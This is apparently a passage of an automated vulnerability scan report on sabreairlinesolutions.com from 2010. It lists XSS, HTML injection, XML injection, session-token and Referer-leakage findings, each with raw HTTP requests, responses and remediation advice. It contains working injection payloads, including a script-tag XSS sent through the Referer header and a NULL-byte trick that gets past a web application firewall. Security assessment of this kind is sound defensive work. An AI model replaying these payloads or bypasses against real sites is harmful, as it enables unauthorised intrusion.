Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A48%3A%22%2Fproducts_services%2Fservices%2Fconsulting_services%2F%22%3Bi%3A1%3Bs%3A55%3A%22%2Fproducts_services%2Fsabre_aircentre_flight_plan_manager%2F%22%3Bi%3A2%3Bs%3A48%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_control%2F%22%3Bi%3A3%3Bs%3A46%3A%22%2Fproducts_services%2Fsabre_gds_display_analysis%2F%22%3Bi%3A4%3Bs%3A38%3A%22%2Fproducts_services%2Fagent_sales_report%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 03:29:41 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23798


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
<a>094e5b00dcb=1">consulting services?%002bc49<a>094e5b00dcb=1</a>
...[SNIP]...

3.142. http://www.sabreairlinesolutions.com/home/products_services/technology/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/technology/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0081621"><a>0b22d3d3d40 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 81621"><a>0b22d3d3d40 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/products_services/technology/?%0081621"><a>0b22d3d3d40=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322231; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A55%3A%22%2Fproducts_services%2Fservices%2Fdelivery_and_customer_care%2F%22%3Bi%3A1%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_recovery_manager%2F%22%3Bi%3A2%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_explorer%2F%22%3Bi%3A3%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_manager%2F%22%3Bi%3A4%3Bs%3A55%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_admin%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 03:33:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322231; expires=Thu, 06-Oct-2011 03:33:36 GMT; path=/
Set-Cookie: exp_last_activity=1286354015; expires=Thu, 06-Oct-2011 03:33:36 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fproducts_services%2Ftechnology%2F%22%3Bi%3A1%3Bs%3A55%3A%22%2Fproducts_services%2Fservices%2Fdelivery_and_customer_care%2F%22%3Bi%3A2%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_recovery_manager%2F%22%3Bi%3A3%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_explorer%2F%22%3Bi%3A4%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_manager%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 03:33:49 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 22109


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
<a href="/home/products_services/technology/?%0081621"><a>0b22d3d3d40=1">
...[SNIP]...

3.143. http://www.sabreairlinesolutions.com/home/includes/form_list [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.sabreairlinesolutions.com
Path:   /home/includes/form_list

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40ca5"><script>alert(1)</script>56456157c47 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /home/includes/form_list HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323073; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fincludes%2Fform_suites%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fproducts_services%2Fcommercial_planning%2Fmy_list%2F%22%3Bi%3A3%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_network%2F%22%3Bi%3A4%3Bs%3A62%3A%22%2Fproducts_services%2Fproduct%2Finterline_electronic_ticketing_hub%2F%22%3B%7D;
Referer: http://www.google.com/search?hl=en&q=40ca5"><script>alert(1)</script>56456157c47

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:30:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286323073; expires=Thu, 06-Oct-2011 10:30:40 GMT; path=/
Set-Cookie: exp_last_activity=1286379040; expires=Thu, 06-Oct-2011 10:30:40 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fincludes%2Fform_list%2F%22%3Bi%3A1%3Bs%3A22%3A%22%2Fincludes%2Fform_suites%2F%22%3Bi%3A2%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A3%3Bs%3A47%3A%22%2Fproducts_services%2Fcommercial_planning%2Fmy_list%2F%22%3Bi%3A4%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_network%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:30:41 GMT
Pragma: no-cache
Content-Length: 2248
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input type="hidden" name="page" value="http://www.google.com/search?hl=en&q=40ca5"><script>alert(1)</script>56456157c47" />
...[SNIP]...

4. XML injection
There are 2 instances of this issue:

Issue background

XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.

This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.

Issue remediation

The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: &lt; and &gt;.


4.1. http://www.sabreairlinesolutions.com/home/products_services/product/web_services [__utmb cookie]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/product/web_services

Issue detail

The __utmb cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the __utmb cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /home/products_services/product/web_services HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322903; __utmb=178985382.2.10.1286295079]]>>; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fproducts_services%2Fproduct%2Finteract_interface%2F%22%3Bi%3A1%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_slot_manager_iata%2F%22%3Bi%3A2%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_codeshare_manager%2F%22%3Bi%3A3%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_gate_manager%2F%22%3Bi%3A4%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 03:15:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322903; expires=Thu, 06-Oct-2011 03:15:47 GMT; path=/
Set-Cookie: exp_last_activity=1286352947; expires=Thu, 06-Oct-2011 03:15:47 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A40%3A%22%2Fproducts_services%2Fproduct%2Fweb_services%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fproducts_services%2Fproduct%2Finteract_interface%2F%22%3Bi%3A2%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_slot_manager_iata%2F%22%3Bi%3A3%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_codeshare_manager%2F%22%3Bi%3A4%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_gate_manager%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 03:16:00 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 21949


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<li>Increases development speed; uses XML, SOAP and travel industry standards,</li>
...[SNIP]...

4.2. http://www.sabreairlinesolutions.com/home/products_services/product/web_services [exp_last_visit cookie]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/product/web_services

Issue detail

The exp_last_visit cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the exp_last_visit cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /home/products_services/product/web_services HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086]]>>; __utmc=178985382; exp_last_activity=1286322903; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fproducts_services%2Fproduct%2Finteract_interface%2F%22%3Bi%3A1%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_slot_manager_iata%2F%22%3Bi%3A2%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_codeshare_manager%2F%22%3Bi%3A3%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_gate_manager%2F%22%3Bi%3A4%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:53:38 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322903; expires=Thu, 06-Oct-2011 02:53:46 GMT; path=/
Set-Cookie: exp_last_activity=1286351626; expires=Thu, 06-Oct-2011 02:53:46 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A40%3A%22%2Fproducts_services%2Fproduct%2Fweb_services%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fproducts_services%2Fproduct%2Finteract_interface%2F%22%3Bi%3A2%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_slot_manager_iata%2F%22%3Bi%3A3%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_codeshare_manager%2F%22%3Bi%3A4%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_gate_manager%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 02:53:51 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 21949


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<li>Increases development speed; uses XML, SOAP and travel industry standards,</li>
...[SNIP]...

5. Session token in URL

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/news_events/event/sabresonic_global_conference2

Issue detail

The response contains the following links that appear to contain session tokens:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

Request

GET /home/news_events/event/sabresonic_global_conference2 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286320657; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 18:30:49 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1286321449; expires=Wed, 05-Oct-2011 18:30:51 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A49%3A%22%2Fnews_events%2Fevent%2Fsabresonic_global_conference2%2F%22%3Bi%3A1%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 05 Oct 2010 18:31:40 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 20524

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<p><a href="http://www1.hilton.com/en_US/hi/hotel/DFWAHHF-Hilton-DFW-Lakes-Executive-Conference-Center-Texas/index.do;jsessionid=F57D2DACFFCDA4F0D4D59B9FB2247200.etc81?brand_id=HI&amp;brand_directory=/en/hi/&amp;xch=694469540,N3FDY4YMODSWGCSGBIV222Q">Hilton DFW Lakes Executive Conference Center</a>
...[SNIP]...

6. Referer-dependent response

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/includes/form_list

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses are updated based on Referer data, then the same defences against malicious input should be employed here as for any other kind of user-supplied data.

Request 1

GET /home/includes/form_list?iframe=true&width=500&height=500 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/my_list/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323073; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fincludes%2Fform_suites%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fproducts_services%2Fcommercial_planning%2Fmy_list%2F%22%3Bi%3A3%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_network%2F%22%3Bi%3A4%3Bs%3A62%3A%22%2Fproducts_services%2Fproduct%2Finterline_electronic_ticketing_hub%2F%22%3B%7D;

Response 1

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:10:37 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286323073; expires=Thu, 06-Oct-2011 10:10:44 GMT; path=/
Set-Cookie: exp_last_activity=1286377844; expires=Thu, 06-Oct-2011 10:10:44 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fincludes%2Fform_list%2F%22%3Bi%3A1%3Bs%3A22%3A%22%2Fincludes%2Fform_suites%2F%22%3Bi%3A2%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A3%3Bs%3A47%3A%22%2Fproducts_services%2Fcommercial_planning%2Fmy_list%2F%22%3Bi%3A4%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_network%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:10:44 GMT
Pragma: no-cache
Content-Length: 2258
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input type="hidden" name="page" value="http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/my_list/" />
<input type="text" name="subject" value="" style="display:none;" />
<table>
<tr>
<td><label for="name">name*</label></td>
<td><input type="text" name="name" id="name" class="required" /></td>
</tr>
<tr>
<td><label for="email">e-mail*</label></td>
<td><input type="text" name="email" id="email" class="required email" /></td>
</tr>
<tr>
<td><label for="phone">phone</label></td>
<td><input type="text" name="phone" id="phone" /></td>
</tr>
<tr>
<td><input type="checkbox" name="self" id="self" value='y' checked="checked" /></td>
<td><label for="self">send me a copy of my list</label></td>
</tr>
<tr>
<td><input type="checkbox" name="sales" value="y" id="sales" /></td>
<td><label for="sales">I would like a sales representative to contact me</label></td>
</tr>
<tr>
<td><label for="colleague">colleague(s)</label></td>
<td><textarea name="colleague" id="colleague"></textarea></td>
</tr>
<tr>
<td><input type="checkbox" name="subscribe" value='y' id="subscribe" /></td>
<td><label for="subscribe">YES, I would like to receive e-mail with more information on Sabre Airline
Solutions... </label></td>
</tr>

<tr>
<td></td>
<td><input type="submit" class="pp_submit" value="submit" /></td>
</tr>
</table>
<br />
<div class="error"><span></span></div>
</form>
</div>
</div>

</body>
</html>

Request 2

GET /home/includes/form_list?iframe=true&width=500&height=500 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323073; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fincludes%2Fform_suites%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fproducts_services%2Fcommercial_planning%2Fmy_list%2F%22%3Bi%3A3%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_network%2F%22%3Bi%3A4%3Bs%3A62%3A%22%2Fproducts_services%2Fproduct%2Finterline_electronic_ticketing_hub%2F%22%3B%7D;

Response 2

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:14:27 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286323073; expires=Thu, 06-Oct-2011 10:14:28 GMT; path=/
Set-Cookie: exp_last_activity=1286378068; expires=Thu, 06-Oct-2011 10:14:28 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fincludes%2Fform_list%2F%22%3Bi%3A1%3Bs%3A22%3A%22%2Fincludes%2Fform_suites%2F%22%3Bi%3A2%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A3%3Bs%3A47%3A%22%2Fproducts_services%2Fcommercial_planning%2Fmy_list%2F%22%3Bi%3A4%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_network%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:14:29 GMT
Pragma: no-cache
Content-Length: 2168
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input type="hidden" name="page" value="" />
<input type="text" name="subject" value="" style="display:none;" />
<table>
<tr>
<td><label for="name">name*</label></td>
<td><input type="text" name="name" id="name" class="required" /></td>
</tr>
<tr>
<td><label for="email">e-mail*</label></td>
<td><input type="text" name="email" id="email" class="required email" /></td>
</tr>
<tr>
<td><label for="phone">phone</label></td>
<td><input type="text" name="phone" id="phone" /></td>
</tr>
<tr>
<td><input type="checkbox" name="self" id="self" value='y' checked="checked" /></td>
<td><label for="self">send me a copy of my list</label></td>
</tr>
<tr>
<td><input type="checkbox" name="sales" value="y" id="sales" /></td>
<td><label for="sales">I would like a sales representative to contact me</label></td>
</tr>
<tr>
<td><label for="colleague">colleague(s)</label></td>
<td><textarea name="colleague" id="colleague"></textarea></td>
</tr>
<tr>
<td><input type="checkbox" name="subscribe" value='y' id="subscribe" /></td>
<td><label for="subscribe">YES, I would like to receive e-mail with more information on Sabre Airline
Solutions... </label></td>
</tr>

<tr>
<td></td>
<td><input type="submit" class="pp_submit" value="submit" /></td>
</tr>
</table>
<br />
<div class="error"><span></span></div>
</form>
</div>
</div>

</body>
</html>

7. Cross-domain Referer leakage

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabreairlinesolutions.com
Path:   /home/news_events

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

Request

GET /home/news_events?%0048092<a>12e2bef5c79=1 HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.sabreairlinesolutions.com
Cookie: exp_last_visit=970953067; exp_last_activity=1286313086; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 18:17:38 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286313086; expires=Wed, 05-Oct-2011 18:17:38 GMT; path=/
Set-Cookie: exp_last_activity=1286320658; expires=Wed, 05-Oct-2011 18:17:38 GMT; path=/
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 05 Oct 2010 18:17:40 GMT
Pragma: no-cache
Content-Length: 7791
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<br />
           <a href="http://phx.corporate-ir.net/phoenix.zhtml?c=73098&p=irol-newsArticle&ID=1475404&highlight=" target="_blank">Sabre Holdings acquires flight planning company f:wz</a>
...[SNIP]...
<br />
           <a href="http://phx.corporate-ir.net/phoenix.zhtml?c=73098&p=irol-newsArticle&ID=1474743&highlight=" target="_blank">Sabre President Tapped by U.S. Commerce Secretary to encourage tourism to the United States</a>
...[SNIP]...
<br />
